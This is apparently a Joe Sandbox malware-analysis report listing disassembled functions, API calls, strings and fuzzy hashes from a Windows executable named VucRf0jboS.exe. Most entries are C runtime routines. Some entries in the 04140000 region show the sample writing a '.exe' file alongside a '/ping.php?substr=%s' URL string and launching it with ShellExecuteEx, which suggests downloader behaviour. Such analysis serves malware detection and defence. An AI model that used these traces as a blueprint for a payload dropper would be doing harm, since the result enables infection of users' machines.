Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::system_error::system_error
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1589814233-1866435925
Opcode ID: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction ID: e717a57c3bd66d4d6b3a04e637a8ef427d00f9af5ed04d9e76d8b2f55ad51479
Opcode Fuzzy Hash: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction Fuzzy Hash: 20F0F67160035DB7DB10AA908C88FD97BA89F89694F15C465ED4876180F7B5798483EC

Uniqueness

Uniqueness Score: -1.00%

Function 00413A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002), ref: 00413A8C
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00413A9F
FreeLibrary.KERNEL32(00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000), ref: 00413AC2

Strings

mscoree.dll, xrefs: 00413A85
CorExitProcess, xrefs: 00413A97

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9dff5006f0e47c0e7765be968ad1406b64006eb2177cec7e1fa0986365244e9b
Instruction ID: 222490b34c4e53a5feae2b87ffa662e2080e553be967456abbd25fb90b6b76cf
Opcode Fuzzy Hash: 9dff5006f0e47c0e7765be968ad1406b64006eb2177cec7e1fa0986365244e9b
Instruction Fuzzy Hash: 1EF08130A10218FBDB109F91DC09BAEBFB8EF54752F400069F809A2290DB344E45CA9C

Uniqueness

Uniqueness Score: -1.00%

Function 0041A950 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00476586db13df40ae9b4ca52299d21b8cb0f2ee272e828588998c86b833e952
Instruction ID: b33920a143986800139fcf22d81ba1a33bebe7e0c53b62ede7835c02ac38fde1
Opcode Fuzzy Hash: 00476586db13df40ae9b4ca52299d21b8cb0f2ee272e828588998c86b833e952
Instruction Fuzzy Hash: 9E712A71D062969BCB308F94C844AFFBB76EF41360F14022BE91457280D774ACE1C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 0415ABB7 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction ID: 600c6440d6ee208a85676c5da57351fd5341fae891bf16b043f04aab907c46bc
Opcode Fuzzy Hash: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction Fuzzy Hash: 4A716D31A80216DFDF259F54C8C4AFEBB79EF413A1F1443A9ED2167160DBB0A941CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00415063 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004150D5
_free.LIBCMT ref: 004150F5

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction ID: 119d67276799711db09ecd5bf14b9939420992e10a89990823b09dedeceb6b84
Opcode Fuzzy Hash: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction Fuzzy Hash: F941E232E00700EBCB15DF79C880A9EB7B1EF89318B1545AAE515EB392D634AD41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 041552CA Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0415533C
_free.LIBCMT ref: 0415535C

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction ID: f49c9fdd51e5f602671343433b01d37f812bd7c5f28b23ba4b5f69559ee8e4c7
Opcode Fuzzy Hash: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction Fuzzy Hash: 5F41D636A00200EFDB14DF78C9C0A9DB7B6EF85314B5545A9D969EB3A4D771F901CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0041B300 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0041197C,?,00000000,?,00000001,?,?,00000001,0041197C,?), ref: 0041B34D
__alloca_probe_16.LIBCMT ref: 0041B385
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0041B3D6
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00410DD1,?), ref: 0041B3E8
__freea.LIBCMT ref: 0041B3F1

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: d59019c36856c0d038f4f00fa65e6381e0e9e1f4e06c47476786303ee0ade61e
Instruction ID: fe6b59a793102c77a27ef18a3bbb39662c21b96f940faf78fbed62ac6a6f166a
Opcode Fuzzy Hash: d59019c36856c0d038f4f00fa65e6381e0e9e1f4e06c47476786303ee0ade61e
Instruction Fuzzy Hash: 3831BF72A0021A9BDB249F65CC41EEF7BA5EB40310F04012EFC14D7291EB39DDA1CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041E403 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0041E40C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E42F

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041E455
_free.LIBCMT ref: 0041E468
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041E477

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: a34debf33ccdb7c840dc0c30cab86c6cd241ab08fa36fff5cfa760907aeefc26
Instruction ID: e222fc366bdc9891f1000934aff4c77bc857fdd668f389f9b834644977e06484
Opcode Fuzzy Hash: a34debf33ccdb7c840dc0c30cab86c6cd241ab08fa36fff5cfa760907aeefc26
Instruction Fuzzy Hash: 9001847AA012157B27211AB75C8CDFB6A6DDEC6FA4315012AFD08D3201DE688C82C5B9

Uniqueness

Uniqueness Score: -1.00%

Function 0415E66A Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0415E673
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0415E696

Part of subcall function 04157CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04157CDE

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0415E6BC
_free.LIBCMT ref: 0415E6CF
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0415E6DE

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: a2b97d9722a52550099a0d12c6cf1aac4d01039bf2330feb9bda49d958931312
Instruction ID: 821b80b5dd1845d05ef1202e071089a07a264c1d44855735f40ed380b8e0f302
Opcode Fuzzy Hash: a2b97d9722a52550099a0d12c6cf1aac4d01039bf2330feb9bda49d958931312
Instruction Fuzzy Hash: 0201B172B01315BB233117B65CC8CBB6A6CDAC2AE0B550169FD28D2120EB61AE0281B9

Uniqueness

Uniqueness Score: -1.00%

Function 00416D9D Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00412386,004170A0,?,00416D47,00000001,00000364,?,0040E430,?,?,?,0040EB2D,?), ref: 00416DA2
_free.LIBCMT ref: 00416DD7
_free.LIBCMT ref: 00416DFE
SetLastError.KERNEL32(00000000), ref: 00416E0B
SetLastError.KERNEL32(00000000), ref: 00416E14

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction ID: 6e49a9887b0250ccd633565296769d6b3062fe87a49412782ccaa8615f8c8364
Opcode Fuzzy Hash: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction Fuzzy Hash: C201F9363847106792217676BC85EEB262D9BC5374763027FF819922D2EF3DCC92505D

Uniqueness

Uniqueness Score: -1.00%

Function 04157004 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,041525ED,04157307,?,04156FAE,00000001,00000364,?,0414E697,?,?,?,0414ED94,?), ref: 04157009
_free.LIBCMT ref: 0415703E
_free.LIBCMT ref: 04157065
SetLastError.KERNEL32(00000000), ref: 04157072
SetLastError.KERNEL32(00000000), ref: 0415707B

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction ID: d23cccaf8880ca3d52b225dee9647f88b8669bde5b8ab1636349b2c0aa1fc44a
Opcode Fuzzy Hash: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction Fuzzy Hash: 2801FE76240600E7A73127F56CC6EEB1299DBC2274F510174FC3A921F0FF21A8014155

Uniqueness

Uniqueness Score: -1.00%

Function 0041ED6E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041ED86

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041ED98
_free.LIBCMT ref: 0041EDAA
_free.LIBCMT ref: 0041EDBC
_free.LIBCMT ref: 0041EDCE

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
Instruction ID: d5ef32133b98e4fb2412931fa35fae6bc57e2fe493cbd1108eefdbae164f4dde
Opcode Fuzzy Hash: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
Instruction Fuzzy Hash: 6DF04F32544310ABCA20EB6AF885DDB73E9BA44714755181AF848D7640C638FCC0865D

Uniqueness

Uniqueness Score: -1.00%

Function 004152B2 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004152D0

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 004152E2
_free.LIBCMT ref: 004152F5
_free.LIBCMT ref: 00415306
_free.LIBCMT ref: 00415317

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction ID: 804699b6a5c80bac2842bae3f4e6e7460cbec33686f784624dec7bd42b1af61a
Opcode Fuzzy Hash: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction Fuzzy Hash: 41F030714413209B8A16BF15FC416893B60FB4871831275AFF50866275CB3959918FCE

Uniqueness

Uniqueness Score: -1.00%

Function 04155519 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 04155537

Part of subcall function 04156501: HeapFree.KERNEL32(00000000,00000000,?,0415F288,?,00000000,?,00000000,?,0415F52C,?,00000007,?,?,0415F920,?), ref: 04156517
Part of subcall function 04156501: GetLastError.KERNEL32(?,?,0415F288,?,00000000,?,00000000,?,0415F52C,?,00000007,?,?,0415F920,?,?), ref: 04156529

_free.LIBCMT ref: 04155549
_free.LIBCMT ref: 0415555C
_free.LIBCMT ref: 0415556D
_free.LIBCMT ref: 0415557E

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction ID: 77bd3cbb6817b6195df488ed19faec6cd6f0ecb905c4338a9c3057a1ea4774f7
Opcode Fuzzy Hash: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction Fuzzy Hash: 63F030B0861110DBDA27AF54FCC06453B61EB14624352756EF92852278CF3657918FCA

Uniqueness

Uniqueness Score: -1.00%

Function 0041608E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Strings

@, xrefs: 0041618D

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2895899722
Opcode ID: 307271cf07234a17719cc341c6256f3d9491265c04953d18a9bfb7d8f1260d71
Instruction ID: ae3557305dc9c54a6d59b1edd30c6b9f9c56a404ae947bd98c264bdf0008d32a
Opcode Fuzzy Hash: 307271cf07234a17719cc341c6256f3d9491265c04953d18a9bfb7d8f1260d71
Instruction Fuzzy Hash: EF51D171D00209ABDB10AFA9C845FEF7BB8AF45314F12015BE804B7292D778D982CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004132C3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\VucRf0jboS.exe,00000104), ref: 00413303
_free.LIBCMT ref: 004133CE
_free.LIBCMT ref: 004133D8

Strings

C:\Users\user\Desktop\VucRf0jboS.exe, xrefs: 004132FA, 00413301, 00413330, 00413368

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\VucRf0jboS.exe
API String ID: 2506810119-3885269222
Opcode ID: 7252df08df779396c6a9f828a3f268b946ea2b753614b366170cf5b7b8345a46
Instruction ID: e0cf6dde0ac7f492d26fb7a27bfd3cf8f71fda75d9391d43b3cd8632259efb82
Opcode Fuzzy Hash: 7252df08df779396c6a9f828a3f268b946ea2b753614b366170cf5b7b8345a46
Instruction Fuzzy Hash: 72319371A0021CABDB219F9698819DEBBB8EB85315F1041ABED14D7210DB799A81CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 0415352A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\VucRf0jboS.exe,00000104), ref: 0415356A
_free.LIBCMT ref: 04153635
_free.LIBCMT ref: 0415363F

Strings

C:\Users\user\Desktop\VucRf0jboS.exe, xrefs: 04153561, 04153568, 04153597, 041535CF

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\VucRf0jboS.exe
API String ID: 2506810119-3885269222
Opcode ID: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction ID: 502daacd6d0c10918e60f6b659263b11685075d049e6a03b64083fc4a38e6f05
Opcode Fuzzy Hash: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction Fuzzy Hash: 6F315371A1025CEFDB25DF999CC49DEBBBCEB84754F1040AAED3497220D770AA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 04166777 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40synchronizationCOMMON

Download Yara Rule

APIs

ShellExecuteEx.SHELL32(?), ref: 041667B9
WaitForSingleObject.KERNEL32(?,00008000), ref: 041667CD
CloseHandle.KERNEL32(?), ref: 041667D6

Strings

.exe, xrefs: 04166782

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: CloseExecuteHandleObjectShellSingleWait
String ID: .exe
API String ID: 3837156514-4119554291
Opcode ID: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction ID: 1a59b1fd7c307611e6b3c4dc5476368fdea9f6615ceaddf3e67f1a76e0a6af7d
Opcode Fuzzy Hash: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction Fuzzy Hash: A6017C31E0021CEBDF15DFA9E8859DDBBB8FF48740F008126F801A6260EB709A45CF84

Uniqueness

Uniqueness Score: -1.00%

Function 041664A9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,.exe,00000000,?,?,04165B74,00000001,?,/ping.php?substr=%s), ref: 041664C4
WriteFile.KERNEL32(00000000,?,?,00000001,00000000,?,04165B74,00000001,?,/ping.php?substr=%s,?), ref: 041664DC
CloseHandle.KERNEL32(00000000,?,04165B74,00000001,?,/ping.php?substr=%s,?), ref: 041664E5

Strings

.exe, xrefs: 041664AE

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: .exe
API String ID: 1065093856-4119554291
Opcode ID: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction ID: 794b6e604379e38eba2cec5fb88e0861c7c98170ab27d96d8c40715b0b27959a
Opcode Fuzzy Hash: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction Fuzzy Hash: 48E06572601224BBD7311B999C48FA7BE6CEF856A0F040165FB05D21109661DC0197B4

Uniqueness

Uniqueness Score: -1.00%

Function 00417D6F Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00417DFA
__alldvrm.LIBCMT ref: 00417FFB
__alldvrm.LIBCMT ref: 0041801D

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: c52314c68bb5d2cd0ec3ccb49d1868c21592631552be694c337c0e3ca6bae7eb
Instruction ID: fd8853d8f1522a73f401650a4168fe8705857821074eec12fc08c2aeadde5945
Opcode Fuzzy Hash: c52314c68bb5d2cd0ec3ccb49d1868c21592631552be694c337c0e3ca6bae7eb
Instruction Fuzzy Hash: 9EA11272A083869FDB218E18C881BEBBBF1EF55354F1441AEE5859B281D63C8982C758

Uniqueness

Uniqueness Score: -1.00%

Function 04157FD6 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 04158061
__alldvrm.LIBCMT ref: 04158262
__alldvrm.LIBCMT ref: 04158284

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction ID: 0d9488e9982cef239b53f976d9f67f8c82ed8b8444847346fae95d1cf4c3e667
Opcode Fuzzy Hash: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction Fuzzy Hash: 48A15672A00786DFEB25EE58C8D07EABFE4EF11350F1841A9DCA59B2A0D334A951C760

Uniqueness

Uniqueness Score: -1.00%

Function 0042286F Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0042299E

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 438df31e4ca0038dfaee660d81f95d1ac1cde2fe31961a88ef6aff440cd1ee1d
Instruction ID: 928e3cb369f2e27a6f9c5d6c25e794823a6f45c2d4bbec1796fd6aa098e8f7c9
Opcode Fuzzy Hash: 438df31e4ca0038dfaee660d81f95d1ac1cde2fe31961a88ef6aff440cd1ee1d
Instruction Fuzzy Hash: B2411B71B002247BDB206B7A9D41BAE36A4EF05334F54021BF818D6291D6FC8DC19669

Uniqueness

Uniqueness Score: -1.00%

Function 04162AD6 Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 04162C05

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 0327c6b289028ba5b2b3c2fb758003783598fcbdb2bec9316035b6f17d33412a
Instruction ID: 6ea3612492e7ddeee5b8421846dc3a2caaa098ace50fda7ac9da37e4be8c9883
Opcode Fuzzy Hash: 0327c6b289028ba5b2b3c2fb758003783598fcbdb2bec9316035b6f17d33412a
Instruction Fuzzy Hash: 5A412A32A10205EAEB257EB88CC4AEE36ACEF41374F1401D5FC39D61A0DB74F56196A6

Uniqueness

Uniqueness Score: -1.00%

Function 0415B567 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,0042E790,00000000,00000000,8B56FF8B,04154002,?,00000004,00000001,0042E790,0000007F,?,8B56FF8B,00000001), ref: 0415B5B4
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0415B63D
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0415B64F
__freea.LIBCMT ref: 0415B658

Part of subcall function 04157CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04157CDE

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 4c9fcdccec6534139f4d5072acc38e80a3e5bc7209392af5cdc3591196cc905b
Instruction ID: dbb23bd79fd887607d6fd552f18cf02a4fc2e6c49a5578191493f817c170140e
Opcode Fuzzy Hash: 4c9fcdccec6534139f4d5072acc38e80a3e5bc7209392af5cdc3591196cc905b
Instruction Fuzzy Hash: 0D31B271A1020ADBDF249F64DC85DEE7BA5EB40314F040169EC28D71A0E735ED60CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0040CCAA Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0040CCC4

Part of subcall function 0040CC11: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0040CC40
Part of subcall function 0040CC11: ___AdjustPointer.LIBCMT ref: 0040CC5B

_UnwindNestedFrames.LIBCMT ref: 0040CCD9
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0040CCEA
CallCatchBlock.LIBVCRUNTIME ref: 0040CD12

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
